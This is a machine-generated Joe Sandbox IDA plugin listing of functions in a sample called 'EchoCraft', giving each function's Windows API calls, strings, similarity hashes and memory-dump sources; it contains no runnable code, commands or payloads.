Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 465d2a9515b1c3ede016a888419dd0ce59a1947fd3d78f8f419daba1e1f83c9a
Instruction ID: 07592de944c0ee6238983c4986f7fc3f598859e620e0df8268e457473fbb9ca4
Opcode Fuzzy Hash: 465d2a9515b1c3ede016a888419dd0ce59a1947fd3d78f8f419daba1e1f83c9a
Instruction Fuzzy Hash: 1F31CEB1510344BFDF209B15ED48FAB37A9EB42356F248025FA04D72E0CBB49D809B70

Function 00AB30A0 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AB30B4

Part of subcall function 00AB2DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?), ref: 00AB2DFE
Part of subcall function 00AB2DE8: GetLastError.KERNEL32(?,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?,?), ref: 00AB2E10

_free.LIBCMT ref: 00AB30C0
_free.LIBCMT ref: 00AB30CB
_free.LIBCMT ref: 00AB30D6
_free.LIBCMT ref: 00AB30E1
_free.LIBCMT ref: 00AB30EC
_free.LIBCMT ref: 00AB30F7
_free.LIBCMT ref: 00AB3102
_free.LIBCMT ref: 00AB310D
_free.LIBCMT ref: 00AB311B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8c75e63281ac36e2161a0f492c5e840a8349e244d2b0c25d0515e6c8e0206649
Instruction ID: 77c5965953f265c88cda8504eea66b4587484940b805d2ee1aba0e27c2a39be4
Opcode Fuzzy Hash: 8c75e63281ac36e2161a0f492c5e840a8349e244d2b0c25d0515e6c8e0206649
Instruction Fuzzy Hash: 84114676610108BFDF01FF94CE42DDD7BA9EF09350F5145A6B9089B132D631DA55DB40

Function 00AF85F1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AF87AE
SetCurrentDirectoryW.KERNEL32(?), ref: 00AF87C2
GetFileAttributesW.KERNEL32(?), ref: 00AF87EC
SetFileAttributesW.KERNEL32(?,00000000), ref: 00AF8806
SetCurrentDirectoryW.KERNEL32(?), ref: 00AF8818
SetCurrentDirectoryW.KERNEL32(?), ref: 00AF8861
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AF88B1

Strings

*.*, xrefs: 00AF8867

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 19a727871ea70154ebd26ca429aee5049447bc2ee4eed16a6aac13bc2ee537de
Instruction ID: dad0d463552faed9111667d4c4fd42368aa0a5c6f634fd938b5693ddf7a27a6f
Opcode Fuzzy Hash: 19a727871ea70154ebd26ca429aee5049447bc2ee4eed16a6aac13bc2ee537de
Instruction Fuzzy Hash: 1081AF725042499BCB60EF94C544ABEB3E8BF88354F54881EFA85CB250EF38D945CB92

Function 00A8698D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A86A1D

Part of subcall function 00A86AAD: GetClientRect.USER32(?,?), ref: 00A86AD3
Part of subcall function 00A86AAD: GetWindowRect.USER32(?,?), ref: 00A86B14
Part of subcall function 00A86AAD: ScreenToClient.USER32(?,?), ref: 00A86B3C

GetDC.USER32 ref: 00AC5960
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AC5973
SelectObject.GDI32(00000000,00000000), ref: 00AC5981
SelectObject.GDI32(00000000,00000000), ref: 00AC5996
ReleaseDC.USER32(?,00000000), ref: 00AC599E
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AC5A2F

Strings

U, xrefs: 00AC58FE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d25c5ff34802b27061127a4e45a853fae4e6efd64cf735de39239a19d1efc94c
Instruction ID: 6041105016eaace4c7f49053aa93e99ec80623f8522ceedbadde73270158f9e5
Opcode Fuzzy Hash: d25c5ff34802b27061127a4e45a853fae4e6efd64cf735de39239a19d1efc94c
Instruction Fuzzy Hash: 5971EC31800605DFCF259F74C884FAA7BB5FF49360F2542A9FD565A2A6CB31AC80DB60

Function 00B1910A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

Part of subcall function 00A81976: GetCursorPos.USER32(?), ref: 00A8198A
Part of subcall function 00A81976: ScreenToClient.USER32(00000000,?), ref: 00A819A7
Part of subcall function 00A81976: GetAsyncKeyState.USER32(00000001), ref: 00A819CC
Part of subcall function 00A81976: GetAsyncKeyState.USER32(00000002), ref: 00A819E6

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00B19173
ImageList_EndDrag.COMCTL32 ref: 00B19179
ReleaseCapture.USER32 ref: 00B1917F
SetWindowTextW.USER32(?,00000000), ref: 00B1921A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B1922D
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00B19307

Strings

@GUI_DROPID, xrefs: 00B19259
@GUI_DRAGFILE, xrefs: 00B192A2

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: aa21f82341f3ff7180d349db92bbb8239f89dee6a576a6a46700d40edd250adc
Instruction ID: 93d5b0b07571374fb6a1f48507e50419293869895e7d089a2fc503d4a7c688b0
Opcode Fuzzy Hash: aa21f82341f3ff7180d349db92bbb8239f89dee6a576a6a46700d40edd250adc
Instruction Fuzzy Hash: D9518E71104340AFD700EF14DC9AFAA77E4FB88711F4005A9F996972E2DB70AD48CB92

Function 00AFCA86 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AFCAA5
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AFCACD
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AFCAFD
GetLastError.KERNEL32 ref: 00AFCB55
SetEvent.KERNEL32(?), ref: 00AFCB69
InternetCloseHandle.WININET(00000000), ref: 00AFCB74

Strings

, xrefs: 00AFCAEE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 94c9bbfcdbf0c2b02208de886cbd0e4b73f77fa6a9c886d7750ddd747ae44c57
Instruction ID: 604fd32348c7d4048380b73102762f7bae57d559c13b2717026997c8705234dd
Opcode Fuzzy Hash: 94c9bbfcdbf0c2b02208de886cbd0e4b73f77fa6a9c886d7750ddd747ae44c57
Instruction Fuzzy Hash: C7319F7550030CAFD722AFA6CE89ABBBBFCEB45750B10451EF54693240DB34DD049B60

Function 00AEA072 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AC3B35,?,?,Bad directive syntax error,00B1DBF4,00000000,00000010,?,?), ref: 00AEA093
LoadStringW.USER32(00000000,?,00AC3B35,?), ref: 00AEA09A

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AEA15E

Strings

., xrefs: 00AEA144
Line %d (File "%s"):, xrefs: 00AEA104
%s (%d) : ==> %s.: %s %s, xrefs: 00AEA0C8
Line %d:, xrefs: 00AEA0E9
Error: , xrefs: 00AEA12C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 66715792ef9891c7bdbd6fb4cd6ba464555eef82dc1ce2ac19a169d00d234250
Instruction ID: 68e3fe0f23e6ee46916eb7fcac3ed07c21af24433543602122ee1078401eeb0a
Opcode Fuzzy Hash: 66715792ef9891c7bdbd6fb4cd6ba464555eef82dc1ce2ac19a169d00d234250
Instruction Fuzzy Hash: 1021BF3280421AABCF11BF90CD0AEEE7B79BF28300F004859F515621A2DB35A618EB11

Function 00AE289F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00AE28AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00AE28C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AE294D

Strings

list, xrefs: 00AE292F
smallicons, xrefs: 00AE2915
SHELLDLL_DefView, xrefs: 00AE28CC
largeicons, xrefs: 00AE28E1
details, xrefs: 00AE28FB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: dc51d2511a3d0840762fb99a1bed5cfa06be53ab1a19ed2bb882cd78be8c60b6
Instruction ID: aed3ce59e4073521a06233d18697c111f6412c9537bbb180e0f176a0f5f59403
Opcode Fuzzy Hash: dc51d2511a3d0840762fb99a1bed5cfa06be53ab1a19ed2bb882cd78be8c60b6
Instruction Fuzzy Hash: F711CA77284347B9FA162725EC07EE737DCEB16724F204026F504E60E2EF9259415655

Function 00ABD2B0 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00ABD2D7
_free.LIBCMT ref: 00ABD342
_free.LIBCMT ref: 00ABD368
_free.LIBCMT ref: 00ABD391
_free.LIBCMT ref: 00ABD3C9
_free.LIBCMT ref: 00ABD3FA
_free.LIBCMT ref: 00ABD43B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00ABD4BC
_free.LIBCMT ref: 00ABD4D5

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 660cebe6852ac1a4b65a4d257b0ddb92448fed9eb21f63c8fdd5dff7a622f83b
Instruction ID: 97319969ed1bee7c3fade74cb98dc5c7a62583afd404df8956e4b655c863da74
Opcode Fuzzy Hash: 660cebe6852ac1a4b65a4d257b0ddb92448fed9eb21f63c8fdd5dff7a622f83b
Instruction Fuzzy Hash: 8061F871A00705AFDF25AF7899817EE7BECAF01320F0446AEE955AB283FB359C018751

Function 00B157B0 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B15862
ShowWindow.USER32(?,00000000), ref: 00B158A3
ShowWindow.USER32(?,00000005,?,00000000), ref: 00B158A9
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B158AD

Part of subcall function 00B175A1: DeleteObject.GDI32(00000000), ref: 00B175CD

GetWindowLongW.USER32(?,000000F0), ref: 00B158E9
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B158F6
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B15929
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B15963
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B15972

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 70a57e6c00d00163508416ea0afe1b36bdac967e22b5163b95e832be604368be
Instruction ID: 93f31f0c339cad451fb27b214fa3c04b48d463994b04d667a469ecee043397c3
Opcode Fuzzy Hash: 70a57e6c00d00163508416ea0afe1b36bdac967e22b5163b95e832be604368be
Instruction Fuzzy Hash: A3518130A41A08EFEF309F15CC49BD93BE5FB853A4F948092BA15961E1C775AAC0DB41

Function 00A815EB Relevance: 13.7, APIs: 9, Instructions: 160windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00AC2B05
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AC2B27
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AC2B3F
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00AC2B5D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AC2B7E
DestroyIcon.USER32(00000000,?,?,?,?,?,00A8143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00AC2B8D
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AC2BAA
DestroyIcon.USER32(00000000,?,?,?,?,?,00A8143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00AC2BB9

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: df24dc62a84337438ab84f6f012610303e7c7c5921b2e27e5a6b433ed1968453
Instruction ID: 7810e5061f3eaae80a6adf32ab88b1067e12d177b06a9981dca6fa2c4ed16f10
Opcode Fuzzy Hash: df24dc62a84337438ab84f6f012610303e7c7c5921b2e27e5a6b433ed1968453
Instruction Fuzzy Hash: 58513870600209EFDB24EF25CC85FAA7BB9EF58750F144528F946972A0EB70ED91DB60

Function 00AFC976 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AFC9B5
GetLastError.KERNEL32 ref: 00AFC9C8
SetEvent.KERNEL32(?), ref: 00AFC9DC

Part of subcall function 00AFCA86: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AFCAA5
Part of subcall function 00AFCA86: GetLastError.KERNEL32 ref: 00AFCB55
Part of subcall function 00AFCA86: SetEvent.KERNEL32(?), ref: 00AFCB69
Part of subcall function 00AFCA86: InternetCloseHandle.WININET(00000000), ref: 00AFCB74

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: e90d346998e38e926f1d414d2f1ce4e35ead72fe03f67b7cb7a1513f7c41bad9
Instruction ID: 1466446004c38170ede32e2bdb37408935912700419ce7a904abca6102ebf2ea
Opcode Fuzzy Hash: e90d346998e38e926f1d414d2f1ce4e35ead72fe03f67b7cb7a1513f7c41bad9
Instruction Fuzzy Hash: 21316F7110160DAFDB219FB2CD44AB6BBF9FF45390B448519FA5683610DB31E9149BA0

Function 00AE2DA2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE4251: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE426B
Part of subcall function 00AE4251: GetCurrentThreadId.KERNEL32 ref: 00AE4272
Part of subcall function 00AE4251: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AE2DB3), ref: 00AE4279

MapVirtualKeyW.USER32(00000025,00000000), ref: 00AE2DBD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AE2DDB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00AE2DDF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AE2DE9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AE2E01
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00AE2E05
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AE2E0F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AE2E23
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00AE2E27

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 03b410e4abc07968fce469fefd5a3b8916f10f3c9a6fd1abef6826a14bf33234
Instruction ID: 0b27b3de93e39ac58911df654fcee66da8fa83ae73da0e31c14dc5645d5a77d3
Opcode Fuzzy Hash: 03b410e4abc07968fce469fefd5a3b8916f10f3c9a6fd1abef6826a14bf33234
Instruction Fuzzy Hash: 1101D8307802247BFB1067699C8AF953F5EDF5DB11F504015F318BF1E0CDE164549A6A

Function 00AE207D Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00AE1CC3,?,?,00000000), ref: 00AE2086
HeapAlloc.KERNEL32(00000000,?,00AE1CC3,?,?,00000000), ref: 00AE208D
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AE1CC3,?,?,00000000), ref: 00AE20A2
GetCurrentProcess.KERNEL32(?,00000000,?,00AE1CC3,?,?,00000000), ref: 00AE20AA
DuplicateHandle.KERNEL32(00000000,?,00AE1CC3,?,?,00000000), ref: 00AE20AD
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AE1CC3,?,?,00000000), ref: 00AE20BD
GetCurrentProcess.KERNEL32(00AE1CC3,00000000,?,00AE1CC3,?,?,00000000), ref: 00AE20C5
DuplicateHandle.KERNEL32(00000000,?,00AE1CC3,?,?,00000000), ref: 00AE20C8
CreateThread.KERNEL32(00000000,00000000,00AE20EE,00000000,00000000,00000000), ref: 00AE20E2

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: cc40f867dd82fc35b699af95ba74fe7294771400580613f82fe123a82ced8f31
Instruction ID: 93b1ca5e65bc7c5bbee5275a52edd9416a9f36abf1bd693326cbd62b8c9da58c
Opcode Fuzzy Hash: cc40f867dd82fc35b699af95ba74fe7294771400580613f82fe123a82ced8f31
Instruction Fuzzy Hash: 8401CDB5240348BFE710AFA5DC4DFAB7BADEB89711F408411FA05EB1A1CAB49C10CB20

Function 00B0A854 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00AEDC3E: CreateToolhelp32Snapshot.KERNEL32 ref: 00AEDC63
Part of subcall function 00AEDC3E: Process32FirstW.KERNEL32(00000000,?), ref: 00AEDC71
Part of subcall function 00AEDC3E: CloseHandle.KERNELBASE(00000000), ref: 00AEDD49

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B0A8DF
GetLastError.KERNEL32 ref: 00B0A8F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B0A925
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B0A9DA
GetLastError.KERNEL32(00000000), ref: 00B0A9E5
CloseHandle.KERNEL32(00000000), ref: 00B0AA36

Strings

SeDebugPrivilege, xrefs: 00B0A901

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 0fae437b712d14d6f1e1e8f04ef1580d866655dae8d77d2c2f93f78182ddb6c9
